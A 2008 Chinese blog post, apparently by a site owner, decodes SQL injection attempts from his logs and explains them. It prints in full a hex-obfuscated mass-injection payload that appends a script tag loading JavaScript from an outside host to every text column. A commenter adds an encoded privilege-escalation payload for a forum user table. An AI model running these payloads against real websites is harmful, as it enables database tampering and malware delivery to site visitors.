解码网站SQL注入代码

时间:2008/6/1 0:23:12      阅读:8606          
      上次在QQ空间中说到SQL注入方法用HEX可绕过一般的IDS,果然这几天网站记录了此类非法扫描记录,还好俺的网站事先有准备,来看一下这些鸟人都干了些什么,找几个记录:

提交参数:1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

解码一下这个:0x730079007300610064006D0069006E00
内容:sysadmin

这很明白,首先判断是否是sysadmin权限,下来就到这个:

提交参数:1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

再解码一下内容变成了:dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

看来还是有点乱,再把上面的转换成小写:declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

好了,经过解码基本能看明白了,简单解释一下,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入代码:</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>

其中(%6b%6b%36%2e%75%73)这段也是经过URL编码的,解码一下变成了:kk6.us
也就是在数据库列中插入代码:</title><script src=http://kk6.us/1.js></script>

好了,只要你的网页从数据库中读取带有此代码的列,便会出现错误,也就是会从kk6.us中读取1.js文件,只要你访问,嘿嘿,你完了……

简单介绍了一下最近注行的注入方法,有什么说得不对的请各位高手多多批评。
评论
  • Re:解码网站SQL注入代码  (2008/6/13 11:06:55) by dib 
    up
  • Re:解码网站SQL注入代码  (2008/6/29 9:51:53) by 唯情 
    能不能提供修补方法呢
  • Re:解码网站SQL注入代码  (2008/6/30 16:46:11) by tthought 
    可不可以在SQL里设置并写一定代码来阻止?
     
  • Re:解码网站SQL注入代码  (2008/7/14 11:14:44) by 中华寻 
    好用
  • Re:解码网站SQL注入代码  (2009/3/10 12:33:18) by ylp1588 
    用存储过程可以解决大部份注入,同时可以控制参数的长度、类型等。
  • Re:解码网站SQL注入代码  (2009/4/7 18:02:17) by lclc88 
    试一下可以不
  • Re:解码网站SQL注入代码  (2009/7/30 18:34:07) by honshon 
    厉害,赶紧测试下自己的网站看看
  • Re:解码网站SQL注入代码  (2009/9/26 11:38:20) by suncathay 

    非常感谢无私的奉献,收藏了。 !!!!

  • Re:解码网站SQL注入代码  (2010/3/25 23:22:24) by 真实姓 
    能不能提供修补方法呢
  • Re:解码网站SQL注入代码  (2010/7/30 16:48:28) by yujie 

    怎么只有sql server有这个问题

  • Re:解码网站SQL注入代码  (2012/3/26 1:16:09) by Black World 

    在提供几个给你们。

     

    %31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

    SQL_en:

    0x31002C00310029003B0075007000640061007400650020005B00640076005F0075007300650072005D00200073006500740020007500730065007200670072006F0075007000690064003D00310020007700680065007200650020007500730065007200690064003D0032003B002D002D002000

    hex:

    0x312C31293B757064617465205B64765F757365725D20736574207573657267726F757069643D31207768657265207573657269643D323B2D2D20

    ASC:

    49 44 49 41 59 117 112 100 97 116 101 32 91 100 118 95 117 115 101 114 93 32 115 101 116 32 117 115 101 114 103 114 111 117 112 105 100 61 49 32 119 104 101 114 101 32 117 115 101 114 105 100 61 50 59 45 45 32

    解开如下:

    1,1);update [dv_user] set usergroupid=1 where userid=2;--

     

                                                                                                                                                                                                          By:Black World

     

     

     

标 题:
 
姓 名:
 
主 页:

验证码:

评论:
 

Because of the cache,you may see your comments several minutes later.